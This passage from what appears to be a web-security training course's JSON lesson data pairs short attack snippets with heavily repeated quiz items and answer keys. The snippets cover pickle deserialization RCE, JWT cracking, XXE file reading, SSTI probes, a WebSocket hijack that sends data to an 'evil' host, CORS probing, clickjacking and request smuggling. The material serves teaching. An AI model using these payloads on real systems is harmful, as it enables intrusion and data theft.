trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Common injection char?","opts":["@","; (semicolon)","#","%"],"ans":1},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"What header prevents clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"deserial","cat":"Web Application","title":"Insecure Deserialization","diff":3,"xp":250,"intro":"Object deserialization RCE.","sections":[{"type":"text","content":"Object deserialization RCE."},{"type":"code","lang":"python","content":"import pickle,os\nclass E:\n def __reduce__(self):\n return (os.system,('id',))"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Why dangerous?","opts":["Code-executing side effects","Slow","Memory","Encryption"],"ans":0},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"jwt-atk","cat":"Web Application","title":"JWT Attacks","diff":2,"xp":150,"intro":"Forge JWT tokens.","sections":[{"type":"text","content":"Forge JWT tokens."},{"type":"code","lang":"bash","content":"# Set alg to 'none', remove signature\nhashcat -m 16500 jwt.txt rockyou.txt"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"alg=none effect?","opts":["Expires","Accepts without verification","Encrypted","Nothing"],"ans":1},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"xxe-atk","cat":"Web Application","title":"XXE Injection","diff":2,"xp":150,"intro":"Read files via XML entities.","sections":[{"type":"text","content":"Read files via XML entities."},{"type":"code","lang":"xml","content":"<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]>\n<root>&xxe;</root>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"XXE abuses?","opts":["XSLT","External Entity definitions","XPath","XQuery"],"ans":1},{"type":"quiz","q":"What header prevents clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"ssti-atk","cat":"Web Application","title":"SSTI Attacks","diff":2,"xp":175,"intro":"Inject into template engines.","sections":[{"type":"text","content":"Inject into template engines."},{"type":"code","lang":"python","content":"{{7*7}} # returns 49 if vulnerable\n{{config.items()}}"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"SSTI test payload?","opts":["<script>","{{7*7}}","' OR 1=1--","; id"],"ans":1},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"websock","cat":"Web Application","title":"WebSocket Attacks","diff":2,"xp":150,"intro":"Exploit WebSocket connections.","sections":[{"type":"text","content":"Exploit WebSocket connections."},{"type":"code","lang":"js","content":"var ws=new WebSocket('wss://target/ws');\nws.onmessage=e=>fetch('https://evil/?d='+btoa(e.data))"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"WebSocket cross-site vuln?","opts":["TCP","No Origin verification","Unencrypted","GET"],"ans":1},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"What header prevents clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"cors-vuln","cat":"Web Application","title":"CORS Misconfiguration","diff":2,"xp":150,"intro":"Exploit permissive CORS.","sections":[{"type":"text","content":"Exploit permissive CORS."},{"type":"code","lang":"bash","content":"curl -H 'Origin: https://evil.com' -I https://target/api"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Dangerous CORS combo?","opts":["Allow-Origin: * + Credentials: true","Methods: GET","Headers: Content-Type","Max-Age"],"ans":0},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"clickjk","cat":"Web Application","title":"Clickjacking","diff":1,"xp":75,"intro":"Iframe overlay tricks.","sections":[{"type":"text","content":"Iframe overlay tricks."},{"type":"code","lang":"html","content":"<iframe src='https://target/delete' style='opacity:0'></iframe>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Prevention header?","opts":["Content-Type","X-Frame-Options","X-XSS-Protection","Referrer-Policy"],"ans":1},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"smuggle","cat":"Web Application","title":"HTTP Request Smuggling","diff":3,"xp":250,"intro":"Front-end/back-end parsing exploit.","sections":[{"type":"text","content":"Front-end/back-end parsing exploit."},{"type":"code","lang":"http","content":"POST / HTTP/1.1\nContent-Length: 13\nTransfer-Encoding: chunked\n0\r\n\r\nSMUGGLED"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Two headers involved?","opts":["Host+Cookie","Content-Length + Transfer-Encoding","Accept+CT","Referer+Origin"],"ans":1},{"type":"quiz","q":"What header prevents 